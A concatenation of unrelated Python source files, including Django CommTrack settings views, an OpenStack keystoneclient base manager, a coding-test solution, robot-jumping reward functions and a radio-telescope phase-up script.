return reverse('default_commtrack_setup', args=[self.domain])
def get(self, *args, **kwargs):
if self.domain_object.commtrack_settings is None:
raise Http404()
return super(BaseCommTrackManageView, self).get(*args, **kwargs)
@method_decorator(domain_admin_required) # TODO: will probably want less restrictive permission?
def dispatch(self, request, *args, **kwargs):
return super(BaseCommTrackManageView, self).dispatch(request, *args, **kwargs)
class CommTrackSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_settings'
page_title = ugettext_noop("Advanced Settings")
template_name = 'domain/admin/commtrack_settings.html'
@property
@memoized
def commtrack_settings(self):
return self.domain_object.commtrack_settings
@property
def page_context(self):
return {
'form': self.commtrack_settings_form
}
@property
@memoized
def commtrack_settings_form(self):
initial = self.commtrack_settings.to_json()
if hasattr(self.commtrack_settings, 'sqlconsumptionconfig'):
initial.update(dict(('consumption_' + k, v) for k, v in
self.commtrack_settings.sqlconsumptionconfig.to_json().items()))
if hasattr(self.commtrack_settings, 'sqlstocklevelsconfig'):
initial.update(dict(('stock_' + k, v) for k, v in
self.commtrack_settings.sqlstocklevelsconfig.to_json().items()))
if self.request.method == 'POST':
return CommTrackSettingsForm(self.request.POST, initial=initial, domain=self.domain)
return CommTrackSettingsForm(initial=initial, domain=self.domain)
def set_ota_restore_config(self):
"""
If the checkbox for syncing consumption fixtures is
checked, then we build the restore config with appropriate
special properties, otherwise just clear the object.
If there becomes a way to tweak these on the UI, this should
be done differently.
"""
if self.commtrack_settings.sync_consumption_fixtures:
self.domain_object.commtrack_settings.sqlstockrestoreconfig = SQLStockRestoreConfig(
section_to_consumption_types={
'stock': 'consumption'
},
force_consumption_case_types=[
SUPPLY_POINT_CASE_TYPE
],
use_dynamic_product_list=True,
)
else:
self.domain_object.commtrack_settings.sqlstockrestoreconfig = SQLStockRestoreConfig()
def post(self, request, *args, **kwargs):
if self.commtrack_settings_form.is_valid():
data = self.commtrack_settings_form.cleaned_data
previous_json = copy.copy(self.commtrack_settings.to_json())
for attr in ('use_auto_consumption', 'sync_consumption_fixtures', 'individual_consumption_defaults'):
setattr(self.commtrack_settings, attr, bool(data.get(attr)))
self.set_ota_restore_config()
fields = ('emergency_level', 'understock_threshold', 'overstock_threshold')
for field in fields:
if data.get('stock_' + field):
setattr(self.commtrack_settings.sqlstocklevelsconfig, field,
data['stock_' + field])
consumption_fields = ('min_transactions', 'min_window', 'optimal_window')
for field in consumption_fields:
if data.get('consumption_' + field):
setattr(self.commtrack_settings.sqlconsumptionconfig, field,
data['consumption_' + field])
try:
self.commtrack_settings.save()
for attr in ('sqlconsumptionconfig', 'sqlstockrestoreconfig', 'sqlstocklevelsconfig'):
submodel = getattr(self.commtrack_settings, attr)
submodel.commtrack_settings = self.commtrack_settings
submodel.save()
except (decimal.InvalidOperation, DataError): # capture only decimal errors and integer overflows
try:
# Get human-readable messages
self.commtrack_settings.sqlstocklevelsconfig.full_clean()
self.commtrack_settings.sqlconsumptionconfig.full_clean()
except ValidationError as e:
for key, msgs in dict(e).items():
for msg in msgs:
messages.error(request, _("Could not save {}: {}").format(key, msg))
for loc_type in LocationType.objects.filter(domain=self.domain).all():
# This will update stock levels based on commtrack config
loc_type.save()
same_flag = previous_json['use_auto_consumption'] == self.commtrack_settings.use_auto_consumption
same_config = (
previous_json['consumption_config'] == self.commtrack_settings.sqlconsumptionconfig.to_json()
)
if (not same_flag or not same_config):
# kick off delayed consumption rebuild
recalculate_domain_consumption_task.delay(self.domain)
messages.success(request, _("Settings updated! Your updated consumption settings may take a "
"few minutes to show up in reports and on phones."))
else:
messages.success(request, _("Settings updated!"))
return HttpResponseRedirect(self.page_url)
return self.get(request, *args, **kwargs)
class DefaultConsumptionView(BaseCommTrackManageView):
urlname = 'update_default_consumption'
template_name = 'commtrack/manage/default_consumption.html'
page_title = ugettext_noop("Consumption")
@property
@memoized
def consumption_form(self):
if self.request.method == 'POST':
return ConsumptionForm(self.domain, self.request.POST)
return ConsumptionForm(self.domain)
@property
def page_context(self):
return {
'form': self.consumption_form,
}
def post(self, request, *args, **kwargs):
if self.consumption_form.is_valid():
self.consumption_form.save()
messages.success(request, _("Default consumption values updated"))
return HttpResponseRedirect(
reverse(DefaultConsumptionView.urlname, args=[self.domain])
)
return self.get(request, *args, **kwargs)
class SMSSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_sms_settings'
page_title = ugettext_noop("SMS")
template_name = 'domain/admin/sms_settings.html'
@property
def page_context(self):
return {
'other_sms_codes': dict(self.get_other_sms_codes()),
'settings': self.settings_context,
}
@property
def settings_context(self):
return {
'actions': [self._get_action_info(a) for a in self.domain_object.commtrack_settings.all_actions],
}
# FIXME
def _get_action_info(self, action):
return {
'type': action.action,
'keyword': action.keyword,
'name': action.subaction,
'caption': action.caption,
}
def get_other_sms_codes(self):
for k, v in all_sms_codes(self.domain).items():
if v[0] == 'product':
yield (k, (v[0], v[1].name))
def post(self, request, *args, **kwargs):
payload = json.loads(request.POST.get('json'))
def make_action(action):
return SQLActionConfig(**{
'action': action['type'],
'subaction': action['caption'],
'keyword': action['keyword'],
'caption': action['caption'],
})
# TODO add server-side input validation here (currently validated on client)
self.domain_object.commtrack_settings.set_actions([make_action(a) for a in payload['actions']])
self.domain_object.commtrack_settings.save()
return self.get(request, *args, **kwargs)
@use_jquery_ui
def dispatch(self, request, *args, **kwargs):
return super(SMSSettingsView, self).dispatch(request, *args, **kwargs)
class RebuildStockStateView(BaseCommTrackManageView):
urlname = 'rebuild_stock_state'
page_title = ugettext_noop("Rebuild Stock State")
template_name = 'commtrack/manage/rebuild_stock_state.html'
@memoized
def get_server_date_by_form_id(self, form_id):
try:
server_date = FormAccessors(self.domain).get_form(form_id).received_on
except XFormNotFound:
return None
else:
return ServerTime(server_date).ui_string()
def _get_selected_case_id(self):
location_id = self.request.GET.get('location_id')
if location_id:
try:
return (SQLLocation.objects
.get(domain=self.domain, location_id=location_id)
.supply_point_id)
except SQLLocation.DoesNotExist:
messages.error(self.request, 'Your location id did not match a location')
@property
def page_context(self, **kwargs):
stock_state_limit = int(self.request.GET.get('stock_state_limit', 100))
stock_transaction_limit = int(self.request.GET.get('stock_transaction_limit', 1000))
stock_state_limit_exceeded = False
stock_transaction_limit_exceeded = False
query = StockTransaction.objects.filter(report__domain=self.domain)
selected_case_id = self._get_selected_case_id()
if selected_case_id:
query = query.filter(case_id=selected_case_id)
selected_product_id = self.request.GET.get('product_id')
if selected_product_id:
query = query.filter(product_id=selected_product_id)
stock_state_keys = [
(txn.case_id, txn.section_id, txn.product_id)
for txn in query
.order_by('case_id', 'section_id', 'product_id')
.distinct('case_id', 'section_id', 'product_id')
[:stock_state_limit]
]
if len(stock_state_keys) >= stock_state_limit:
stock_state_limit_exceeded = True
actions_by_stock_state_key = []
stock_transaction_count = 0
for stock_state_key in stock_state_keys:
actions = self.get_actions_by_stock_state_key(*stock_state_key)
stock_transaction_count += len(actions[1])
if stock_transaction_count > stock_transaction_limit:
stock_transaction_limit_exceeded = True
break
actions_by_stock_state_key.append(actions)
assert len(set(stock_state_keys)) == len(stock_state_keys)
return {
'actions_by_stock_state_key': actions_by_stock_state_key,
'stock_state_limit_exceeded': stock_state_limit_exceeded,
'stock_state_limit': stock_state_limit,
'stock_transaction_limit_exceeded': stock_transaction_limit_exceeded,
'stock_transaction_limit': stock_transaction_limit,
}
def get_actions_by_stock_state_key(self, case_id, section_id, product_id):
actions = [
(
action.__class__.__name__,
action,
self.get_server_date_by_form_id(
action.stock_transaction.report.form_id),
) for action in
plan_rebuild_stock_state(case_id, section_id, product_id)
]
return (
{'case_id': case_id,
'section_id': section_id,
'product_id': product_id},
actions,
get_doc_info_by_id(self.domain, case_id)
)
def post(self, request, *args, **kwargs):
case_id = request.POST.get('case_id')
section_id = request.POST.get('section_id')
product_id = request.POST.get('product_id')
if None in (case_id, section_id, product_id):
return HttpResponseBadRequest()
rebuild_stock_state(case_id, section_id, product_id)
return HttpResponseRedirect('.')
|
# Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack Foundation
# Copyright 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base utilities to build API operation managers and objects on top of.
"""
import abc
import functools
import six
from six.moves import urllib
from keystoneclient import auth
from keystoneclient import exceptions
from keystoneclient.i18n import _
from keystoneclient.openstack.common.apiclient import base
def getid(obj):
"""Return id if argument is a Resource.
Abstracts the common pattern of allowing both an object or an object's ID
(UUID) as a parameter when dealing with relationships.
"""
try:
if obj.uuid:
return obj.uuid
except AttributeError:
pass
try:
return obj.id
except AttributeError:
return obj
def filter_none(**kwargs):
"""Remove any entries from a dictionary where the value is None."""
return dict((k, v) for k, v in six.iteritems(kwargs) if v is not None)
def filter_kwargs(f):
@functools.wraps(f)
def func(*args, **kwargs):
new_kwargs = {}
for key, ref in six.iteritems(kwargs):
if ref is None:
# drop null values
continue
id_value = getid(ref)
if id_value != ref:
# If an object with an id was passed, then use the id, e.g.:
# user: user(id=1) becomes user_id: 1
key = '%s_id' % key
new_kwargs[key] = id_value
return f(*args, **new_kwargs)
return func
class Manager(object):
"""Basic manager type providing common operations.
Managers interact with a particular type of API (servers, flavors, images,
etc.) and provide CRUD operations for them.
:param client: instance of BaseClient descendant for HTTP requests
"""
resource_class = None
def __init__(self, client):
super(Manager, self).__init__()
self.client = client
@property
def api(self):
"""Deprecated. Use `client` instead.
"""
return self.client
def _list(self, url, response_key, obj_class=None, body=None, **kwargs):
"""List the collection.
:param url: a partial URL, e.g., '/servers'
:param response_key: the key to be looked up in response dictionary,
e.g., 'servers'
:param obj_class: class for constructing the returned objects
(self.resource_class will be used by default)
:param body: data that will be encoded as JSON and passed in POST
request (GET will be sent by default)
:param kwargs: Additional arguments will be passed to the request.
"""
if body:
resp, body = self.client.post(url, body=body, **kwargs)
else:
resp, body = self.client.get(url, **kwargs)
if obj_class is None:
obj_class = self.resource_class
data = body[response_key]
# NOTE(ja): keystone returns values as list as {'values': [ ... ]}
# unlike other services which just return the list...
try:
data = data['values']
except (KeyError, TypeError):
pass
return [obj_class(self, res, loaded=True) for res in data if res]
def _get(self, url, response_key, **kwargs):
"""Get an object from collection.
:param url: a partial URL, e.g., '/servers'
:param response_key: the key to be looked up in response dictionary,
e.g., 'server'
:param kwargs: Additional arguments will be passed to the request.
"""
resp, body = self.client.get(url, **kwargs)
return self.resource_class(self, body[response_key], loaded=True)
def _head(self, url, **kwargs):
"""Retrieve request headers for an object.
:param url: a partial URL, e.g., '/servers'
:param kwargs: Additional arguments will be passed to the request.
"""
resp, body = self.client.head(url, **kwargs)
return resp.status_code == 204
def _create(self, url, body, response_key, return_raw=False, **kwargs):
"""Deprecated. Use `_post` instead.
"""
return self._post(url, body, response_key, return_raw, **kwargs)
def _post(self, url, body, response_key, return_raw=False, **kwargs):
"""Create an object.
:param url: a partial URL, e.g., '/servers'
:param body: data that will be encoded as JSON and passed in POST
request (GET will be sent by default)
:param response_key: the key to be looked up in response dictionary,
e.g., 'servers'
:param return_raw: flag to force returning raw JSON instead of
Python object of self.resource_class
:param kwargs: Additional arguments will be passed to the request.
"""
resp, body = self.client.post(url, body=body, **kwargs)
if return_raw:
return body[response_key]
return self.resource_class(self, body[response_key])
def _put(self, url, body=None, response_key=None, **kwargs):
"""Update an object with PUT method.
:param url: a partial URL, e.g., '/servers'
:param body: data that will be encoded as JSON and passed in POST
request (GET will be sent by default)
:param response_key: the key to be looked up in response dictionary,
e.g., 'servers'
:param kwargs: Additional arguments will be passed to the request.
"""
resp, body = self.client.put(url, body=body, **kwargs)
# PUT requests may not return a body
if body is not None:
if response_key is not None:
return self.resource_class(self, body[response_key])
else:
return self.resource_class(self, body)
def _patch(self, url, body=None, response_key=None, **kwargs):
"""Update an object with PATCH method.
:param url: a partial URL, e.g., '/servers'
:param body: data that will be encoded as JSON and passed in POST
request (GET will be sent by default)
:param response_key: the key to be looked up in response dictionary,
e.g., 'servers'
:param kwargs: Additional arguments will be passed to the request.
"""
resp, body = self.client.patch(url, body=body, **kwargs)
if response_key is not None:
return self.resource_class(self, body[response_key])
else:
return self.resource_class(self, body)
def _delete(self, url, **kwargs):
"""Delete an object.
:param url: a partial URL, e.g., '/servers/my-server'
:param kwargs: Additional arguments will be passed to the request.
"""
return self.client.delete(url, **kwargs)
def _update(self, url, body=None, response_key=None, method="PUT",
**kwargs):
methods = {"PUT": self.client.put,
"POST": self.client.post,
"PATCH": self.client.patch}
try:
resp, body = methods[method](url, body=body,
**kwargs)
except KeyError:
raise exceptions.ClientException(_("Invalid update method: %s")
% method)
# PUT requests may not return a body
if body:
return self.resource_class(self, body[response_key])
@six.add_metaclass(abc.ABCMeta)
class ManagerWithFind(Manager):
"""Manager with additional `find()`/`findall()` methods."""
@abc.abstractmethod
def list(self):
pass
def find(self, **kwargs):
"""Find a single item with attributes matching ``**kwargs``.
This isn't very efficient: it loads the entire list then filters on
the Python side.
"""
rl = self.findall(**kwargs)
num = len(rl)
if num == 0:
msg = _("No %(name)s matching %(kwargs)s.") % {
'name': self.resource_class.__name__, 'kwargs': kwargs}
raise exceptions.NotFound(404, msg)
elif num > 1:
raise exceptions.NoUniqueMatch
else:
return rl[0]
def findall(self, **kwargs):
"""Find all items with attributes matching ``**kwargs``.
This isn't very efficient: it loads the entire list then filters on
the Python side.
"""
found = []
searches = kwargs.items()
for obj in self.list():
try:
if all(getattr(obj, attr) == value
for (attr, value) in searches):
found.append(obj)
except AttributeError:
continue
return found
class CrudManager(Manager):
"""Base manager class for manipulating Keystone entities.
Children of this class are expected to define a `collection_key` and `key`.
- `collection_key`: Usually a plural noun by convention (e.g. `entities`);
used to refer collections in both URL's (e.g. `/v3/entities`) and JSON
objects containing a list of member resources (e.g. `{'entities': [{},
{}, {}]}`).
- `key`: Usually a singular noun by convention (e.g. `entity`); used to
refer to an individual member of the collection.
"""
collection_key = None
key = None
base_url = None
def build_url(self, dict_args_in_out=None):
"""Builds a resource URL for the given kwargs.
Given an example collection where `collection_key = 'entities'` and
`key = 'entity'`, the following URL's could be generated.
By default, the URL will represent a collection of entities, e.g.::
/entities
If kwargs contains an `entity_id`, then the URL will represent a
specific member, e.g.::
/entities/{entity_id}
If a `base_url` is provided, the generated URL will be appended to it.
"""
if dict_args_in_out is None:
dict_args_in_out = {}
url = dict_args_in_out.pop('base_url', None) or self.base_url or ''
url += '/%s' % self.collection_key
# do we have a specific entity?
entity_id = dict_args_in_out.pop('%s_id' % self.key, None)
if entity_id is not None:
url += '/%s' % entity_id
return url
@filter_kwargs
def create(self, **kwargs):
url = self.build_url(dict_args_in_out=kwargs)
return self._create(
url,
{self.key: kwargs},
self.key)
@filter_kwargs
def get(self, **kwargs):
return self._get(
self.build_url(dict_args_in_out=kwargs),
self.key)
@filter_kwargs
def head(self, **kwargs):
return self._head(self.build_url(dict_args_in_out=kwargs))
def _build_query(self, params):
return '?%s' % urllib.parse.urlencode(params) if params else ''
@filter_kwargs
def list(self, fallback_to_auth=False, **kwargs):
url = self.build_url(dict_args_in_out=kwargs)
try:
query = self._build_query(kwargs)
url_query = '%(url)s%(query)s' % {'url': url, 'query': query}
return self._list(
url_query,
self.collection_key)
except exceptions.EmptyCatalog:
if fallback_to_auth:
return self._list(
url_query,
self.collection_key,
endpoint_filter={'interface': auth.AUTH_INTERFACE})
else:
raise
@filter_kwargs
def put(self, **kwargs):
return self._update(
self.build_url(dict_args_in_out=kwargs),
method='PUT')
@filter_kwargs
def update(self, **kwargs):
url = self.build_url(dict_args_in_out=kwargs)
return self._update(
url,
{self.key: kwargs},
self.key,
method='PATCH')
@filter_kwargs
def delete(self, **kwargs):
return self._delete(
self.build_url(dict_args_in_out=kwargs))
@filter_kwargs
def find(self, **kwargs):
"""Find a single item with attributes matching ``**kwargs``."""
url = self.build_url(dict_args_in_out=kwargs)
query = self._build_query(kwargs)
rl = self._list(
'%(url)s%(query)s' % {
'url': url,
'query': query,
},
self.collection_key)
num = len(rl)
if num == 0:
msg = _("No %(name)s matching %(kwargs)s.") % {
'name': self.resource_class.__name__, 'kwargs': kwargs}
raise exceptions.NotFound(404, msg)
elif num > 1:
raise exceptions.NoUniqueMatch
else:
return rl[0]
class Resource(base.Resource):
"""Base class for OpenStack resources (tenant, user, etc.).
This is pretty much just a bag for attributes.
"""
def delete(self):
return self.manager.delete(self)
|
# [카카오] 추석 트래픽
"""
다음 시작 시간 - 1000이 현재 끝나는 시간보다 안쪽에 있거나 같다면 +1
"""
def solution(lines):
answer = 0
start_time = []
end_time = []
for t in lines:
time = t.split(" ")
start_time.append(get_start_time(time[1], time[2]))
end_time.append(get_time(time[1]))
for i in range(len(lines)):
cnt = 0
cur_end_time = end_time[i]
for j in range(i, len(lines)):
if cur_end_time > start_time[j] - 1000:
cnt += 1
answer = max(answer, cnt)
return answer
def get_time(time):
hour = int(time[:2]) * 3600
minute = int(time[3:5]) * 60
second = int(time[6:8])
millisecond = int(time[9:])
return (hour + minute + second) * 1000 + millisecond
def get_start_time(time, duration_time):
n_time = duration_time[:-1]
int_duration_time = int(float(n_time) * 1000)
return get_time(time) - int_duration_time + 1
if __name__ == "__main__":
lines = [
"2016-09-15 20:59:57.421 0.351s",
"2016-09-15 20:59:58.233 1.181s",
"2016-09-15 20:59:58.299 0.8s",
"2016-09-15 20:59:58.688 1.041s",
"2016-09-15 20:59:59.591 1.412s",
"2016-09-15 21:00:00.464 1.466s",
"2016-09-15 21:00:00.741 1.581s",
"2016-09-15 21:00:00.748 2.31s",
"2016-09-15 21:00:00.966 0.381s",
"2016-09-15 21:00:02.066 2.62s"
]
t = lines[0].split(" ")[1]
print(solution(lines))
|
import unittest
import os
from polyglot.model import LanguageModel
from polyglot.classifier import Classifier
import cStringIO
from time import time
import logging
logging.basicConfig(format='%(asctime)s -- %(message)s', level=logging.INFO)
class TestShit(unittest.TestCase):
ngram = 3
corpus_dir = './corpus'
model_fp = cStringIO.StringIO()
# model_fp = open('../model.json')
def test_corpus(self):
print 'Training',
db = LanguageModel(self.model_fp)
god = Classifier(db, self.ngram)
god.train(self.corpus_dir)
print 'done'
_, langs, _ = os.walk(self.corpus_dir).next()
for lang in filter(lambda l: not l.startswith('.'), langs):
file_paths = []
for root, _, files in os.walk(os.path.join(self.corpus_dir, lang)):
file_paths.extend(map(lambda fn: os.path.join(root, fn), files))
for fpath in file_paths:
print fpath,
ts = time()
self.assertEqual(god.classify(open(fpath).read())[0][0], lang)
print 'passed, took: %2.4f sec' % (time()-ts)
if __name__ == '__main__':
unittest.main()
|
# https://github.com/godbmw/various-codes/tree/master/DictEmotionAlgorithm
# https://github.com/AimeeLee77/senti_analysis/tree/master/data/ChnSentiCorp_htl_ba_2000
# https://github.com/godbmw/news-emotion/tree/master/data/trainset
import os
import io
DIR = os.path.join(os.path.dirname(__file__), "../unprepared_test_data")
def get_files(input_dir):
files = []
for (dirpath, dirnames, filenames) in os.walk(input_dir):
files.extend([os.path.join(dirpath, x)
for x in filenames if x.endswith(".txt")])
return files
def predict_encoding(file_path, n_lines=20):
'''Predict a file's encoding using chardet'''
import chardet
# Open the file as binary data
with open(file_path, 'rb') as f:
# Join binary lines for specified number of lines
rawdata = b''.join([f.readline() for _ in range(n_lines)])
return chardet.detect(rawdata)['encoding']
def loop_files(input_dir, output):
files = get_files(input_dir)
with open(output, "w") as output:
for file in files:
encoding = predict_encoding(file)
print(file, encoding)
basename = os.path.basename(file)
mark = ""
if basename.startswith("neg"):
mark = "n"
elif basename.startswith("pos"):
mark = "p"
else:
continue
if not encoding:
encoding = "gb2312"
try:
with io.open(file, encoding=encoding) as f:
content = f.read().strip().replace("\n", "")
output.write(content + "\t" + mark+"\n")
except Exception:
continue
input_dir = os.path.join(DIR, "DictEmotionAlgorithm")
output = os.path.join(DIR, "../test_data/DictEmotionAlgorithm.txt")
loop_files(input_dir, output)
input_dir = os.path.join(DIR, "ChnSentiCorp_htl_ba_2000")
output = os.path.join(DIR, "../test_data/ChnSentiCorp_htl_ba_2000.txt")
loop_files(input_dir, output)
input_dir = os.path.join(DIR, "trainset")
output = os.path.join(DIR, "../test_data/trainset.txt")
loop_files(input_dir, output)
|
from .p141_assigned import P141Assigned
from dataclasses import dataclass
@dataclass
class P35HasIdentified(P141Assigned):
"""
Scope note:
This property identifies the E3 Condition State that was observed in an E14 Condition Assessment activity.
Examples:
- 1997 condition assessment of silver cup 232 (E14) has identified oxidation traces were present in 1997 (E3) has type oxidation traces (E55)
In First Order Logic:
P35(x,y) ⊃E14(x)
P35(x,y) ⊃ E3(y)
P35(x,y) ⊃ P141(x,y)
"""
URI = "http://erlangen-crm.org/current/P35_has_identified"
|
import numpy as np
from quadruped_spring.env.tasks.task_base import TaskJumping
class JumpingOnPlaceHeight(TaskJumping):
"""
Robot has to perform one single jump in place. It has to fall the closest as possible
to the place it landed. Sparse reward based on maximizing the absolute reached height.
"""
def __init__(self):
super().__init__()
def _reward(self):
"""Remember the reward is sparse. So is 0 except the end of the episode."""
return 0
def _reward_end_episode(self):
"""Compute bonus and malus to add to reward at the end of the episode"""
reward = 0
max_height = 0.8
# max_height_normalized = self._relative_max_height / max_height
if self._relative_max_height > max_height:
max_height_normalized = 1.0
else:
max_height_normalized = self._relative_max_height / max_height
reward += 0.8 * max_height_normalized
reward += max_height_normalized * 0.03 * np.exp(-self._max_yaw**2 / 0.01) # orientation
reward += max_height_normalized * 0.03 * np.exp(-self._max_roll**2 / 0.01) # orientation
reward += max_height_normalized * 0.05 * np.exp(-self._max_forward_distance**2 / 0.05) # be on place
reward += max_height_normalized * 0.08 * np.exp(-self._max_vel_err**2 / 0.001) # vel direction is similar to [0,0,1]
if not self._terminated():
# Alive bonus proportional to the risk taken
reward += 0.1 * max_height_normalized
else:
# Malus for crashing
# Optionally: no reward in case of crash
reward -= 0.08
return reward
def _reset(self, env):
super()._reset(env)
landing_pose = self._env._robot_config.INIT_MOTOR_ANGLES
self._env._ac_interface.set_landing_pose(landing_pose)
class JumpingForward(TaskJumping):
"""
Robot has to perform a forward jumping. Sparse reward based on maximizing the maximum flight time
and the forward distance. Bonus for mantaining the right orientation, malus on crushing.
"""
def __init__(self):
super().__init__()
def _reward(self):
"""Remember the reward is sparse. So is 0 except the end of the episode."""
return 0
def _reward_end_episode(self):
"""Compute bonus and malus to add to reward at the end of the episode"""
reward = 0
if self._terminated():
# Malus for crashing
# Optionally: no reward in case of crash
reward -= 0.08
max_distance = 0.2
max_fwd_distance_normalized = self._max_forward_distance / max_distance
reward += self._max_flight_time
reward += 0.1 * max_fwd_distance_normalized
reward += self._max_flight_time * 0.05 * np.exp(-self._max_yaw**2 / 0.01) # orientation
reward += self._max_flight_time * 0.05 * np.exp(-self._max_roll**2 / 0.01) # orientation
if self._max_flight_time > 0 and not self._terminated():
# Alive bonus proportional to the risk taken
reward += 0.1 * self._max_flight_time
# print(f"Forward dist: {self._max_forward_distance}")
return reward
|
#!/usr/bin/python
# Track target(s) for a specified time.
# Also set the data gains before and after the track
# The *with* keyword is standard in Python 2.6, but has to be explicitly imported in Python 2.5
from __future__ import with_statement
import time
from katcorelib.observe import standard_script_options, verify_and_connect, collect_targets, user_logger,start_session
#from katcorelib import ant_array,standard_script_options, verify_and_connect, collect_targets, start_session, user_logger
import katpoint
import pickle
import numpy as np
import StringIO
import logging
#import fbf_katcp_wrapper as fbf
# read the bandpass solutions from a pickle file
raw_data,bpass_h,bpass_v=pickle.load(open('/home/kat/comm/scripts/bpass.pikl'))
# Set up standard script options
parser = standard_script_options(usage="%prog [options] <'target/catalogue'> [<'target/catalogue'> ...]",
description='Track one or more sources for a specified time. At least one '
'target must be specified. Note also some **required** options below.')
# Add experiment-specific options
#parser.add_option('--project-id',
# help='Project ID code the observation (**required**) This is a required option')
parser.add_option('-t', '--track-duration', type='float', default=60.0,
help='Length of time to track each source, in seconds (default=%default)')
parser.add_option('-m', '--max-duration', type='float', default=None,
help='Maximum duration of the script in seconds, after which script will end '
'as soon as the current track finishes (no limit by default)')
parser.add_option('--repeat', action="store_true", default=False,
help='Repeatedly loop through the targets until maximum duration (which must be set for this)')
parser.add_option('--reset', action="store_true", default=False,
help='Reset the gains to 160.')
parser.add_option('--half-band', action='store_true', default=True,
help='Use only inner 50% of output band')
parser.add_option('--transpose', action='store_true', default=False,
help='Transpose time frequency blocks from correlator')
# Set default value for any option (both standard and experiment-specific options)
parser.set_defaults(observer='comm_test',nd_params='off',project_id='COMMTEST',description='Phaseup observation setting f-engine weights',dump_rate=1.0)
# Parse the command line
opts, args = parser.parse_args()
# Check options and build KAT configuration, connecting to proxies and devices
with verify_and_connect(opts) as kat:
ants = kat.ants
obs_ants = [ant.name for ant in ants]
observation_sources = collect_targets(kat,args)
# Find out what inputs are curremtly active
reply = kat.data.req.dbe_label_input()
inputs = [m.arguments[0] for m in reply.messages[3:]]
user_logger.info("Resetting f-engine gains to 160 to allow phasing up")
for inp in inputs:
kat.data.req.dbe_k7_gain(inp,160)
# Quit early if there are no sources to observe
if len(observation_sources.filter(el_limit_deg=opts.horizon)) == 0:
user_logger.warning("No targets are currently visible - please re-run the script later")
else:
# Start capture session, which creates HDF5 file
with start_session(kat, **vars(opts)) as session:
session.standard_setup(**vars(opts))
session.capture_start()
start_time = time.time()
targets_observed = []
# Keep going until the time is up
keep_going = True
while keep_going:
for target in observation_sources.iterfilter(el_limit_deg=opts.horizon):
if target.flux_model is None:
user_logger.warning("Target has no flux model - stopping script")
keep_going=False
break
# observe the target for 60 seconds to determine the
# antenna gains
target.add_tags('bpcal')
session.label('track')
user_logger.info("Initiating %g-second track on target '%s'" % (60,target.name,))
session.track(target, duration=60, announce=False)
time.sleep(5)
# get and set the weights
for inp in inputs:
if inp[:-1] not in obs_ants : continue
pol = inp[-1]
if pol == 'v':
gains = bpass_v[inp[:-1]]
else:
gains = bpass_h[inp[:-1]]
gains = np.hstack((np.zeros(1),gains))
weights = getattr(kat.data.sensor,'k7w_'+inp+'_gain_correction_per_channel').get_reading().value
# added print statement - weigths empty?
update = getattr(kat.data.sensor,'k7w_'+inp+'_gain_correction_per_channel').get_reading().timestamp
user_logger.info("Gain sensors updated at %s"%katpoint.Timestamp(update).local())
f = StringIO.StringIO(weights)
orig_weights = np.loadtxt(f, dtype=np.complex,delimiter=' ')
amp_weights = np.abs(orig_weights)
phase_weights = orig_weights / amp_weights
ind = np.repeat(False,1024)
# here is where you hack things to get "fuller" band
#ind[slice(10,1000)]=True # this will not work! but do not have time to repair that
ind[slice(200,800)]=True
gains[~ind] = 160.0
N = phase_weights[ind].shape[0]
z = np.polyfit(np.arange(N),np.unwrap(np.angle(phase_weights)[ind]),1)
#print z
phase = np.zeros(1024)
#phase[ind] = np.angle(phase_weights[ind])
phase[ind] = z[0]*np.arange(N)+z[1]
new_weights = (160.0 / gains ) * np.exp(1j * phase)
weights_str = ' '.join([('%+5.3f%+5.3fj' % (w.real,w.imag)) for w in new_weights])
kat.data.req.dbe_k7_gain(inp,weights_str)
#because we are phasing in the f-engine set the b-engine weights to 1
bf_weights_str = ' '.join(1024 * ['1'])
if pol == 'v':
kat.data.req.dbe_k7_beam_weights('bf1',inp,bf_weights_str)
else:
kat.data.req.dbe_k7_beam_weights('bf0',inp,bf_weights_str)
user_logger.info("Initiating %g-second track on target '%s'" % (60,target.name,))
session.track(target, duration=60, announce=False)
keep_going = False
if opts.reset:
user_logger.info("Resetting f-engine gains to 160")
for inp in inputs:
kat.data.req.dbe_k7_gain(inp,160)
|
from . import Globals
from .ReadMatrix import ReadMatrix
from .ReadComplexMatrix import ReadComplexMatrix
from .PlotMatrix import PlotMatrix
from .PlotMatrix3D import PlotMatrix3D
from .MatrixVariation import MatrixVariation
from . import Unwrapping
<<<<<<< HEAD
=======
from . import Smooth
from .GetComplex import GetComplex
from .MatrixUnwrap import MatrixUnwrap
>>>>>>> 499201e6ac3c421df34c9587dc836a229caa5520
|
from .packet_endpoints import (
Packet_EP,
Packet_Table_EP,
Packet_Table_Counts_EP,
Packet_Table_Views_EP,
)
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Common command-line arguments for filtering Isovar results
"""
from __future__ import print_function, division, absolute_import
from collections import OrderedDict
from ..default_parameters import (
MIN_NUM_RNA_ALT_FRAGMENTS,
MIN_NUM_RNA_ALT_READS,
MIN_FRACTION_RNA_ALT_FRAGMENTS,
MIN_RATIO_RNA_ALT_TO_OTHER_FRAGMENTS
)
def add_filter_args(parser):
"""
Extends an ArgumentParser instance with commandline arguments related
to filtering variants and/or their associated protein sequences.
"""
filter_group = parser.add_argument_group("Filtering")
filter_group.add_argument(
"--min-alt-rna-reads",
type=int,
default=MIN_NUM_RNA_ALT_READS,
help="Minimum number of reads supporting variant allele (default %(default)s)")
filter_group.add_argument(
"--min-alt-rna-fragments",
type=int,
default=MIN_NUM_RNA_ALT_FRAGMENTS,
help=(
"Minimum number of fragments supporting variant allele (default %(default)s). "
"Note that this option is the same as --min-alt-rna-reads for single-end "
"sequencing."))
filter_group.add_argument(
"--min-alt-rna-fraction",
type=float,
default=MIN_FRACTION_RNA_ALT_FRAGMENTS,
